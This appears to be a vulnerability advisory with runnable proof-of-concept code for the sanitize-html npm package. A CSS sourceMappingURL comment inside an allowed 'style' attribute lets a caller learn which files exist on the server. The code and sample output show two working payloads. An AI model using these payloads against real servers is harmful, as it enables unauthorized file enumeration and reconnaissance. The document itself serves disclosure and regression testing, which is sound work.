The sanitize-html package, when used on the backend with the "style" attribute allowed, lets a caller determine whether files exist on the server's filesystem (including project dependencies), i.e. enumerate files.
npm i sanitize-html
node index.js
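// index.js
// Reproduction of the file-existence oracle: two inputs that differ only in the
// path named inside a CSS `sourceMappingURL` comment are sanitized with the same
// options; the "style" attribute surviving for one and not the other reveals
// whether that path exists on the host running the sanitizer.
const sanitizeHtml = require('sanitize-html');

// First path exists once sanitize-html is installed; second does not.
const file_exist = `<a style='background-image: url("/*# sourceMappingURL=./node_modules/sanitize-html/index.js */");'>@slonser_</a>`;
const file_notexist = `<a style='background-image: url("/*# sourceMappingURL=./node_modules/randomlibrary/index.js */");'>@slonser_</a>`;

// Allowing "style" on <a> is the precondition for the issue (presumably because the
// attribute value is then parsed as CSS, where the comment is interpreted — confirm
// against the library's CSS handling). Options are shared so both calls are identical.
const options = {
  allowedAttributes: { ...sanitizeHtml.defaults.allowedAttributes, a: ['style'] },
};

const file_exist_clean = sanitizeHtml(file_exist, options);
const file_notexist_clean = sanitizeHtml(file_notexist, options);

// Expected on an affected install: the first output has no style attribute, the
// second keeps it. A sanitizer that does not touch the filesystem must yield the
// same shape for both, which makes this pair usable as a regression check.
console.log(file_exist_clean, "// valid file path on backend");
console.log(file_notexist_clean, "// invalid file path on backend");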
Output:
<a>@slonser_</a> // valid file path on backend
<a style="background-image:url("/*# sourceMappingURL=./node_modules/randomlibrary/index.js */")">@slonser_</a> // invalid file path on backend
When the named file actually exists on the server (and is not a valid source map), the "style" attribute is stripped from the output; when it does not exist, the attribute is preserved.
Vsevolod Kokorin (Slonser) of Solidlab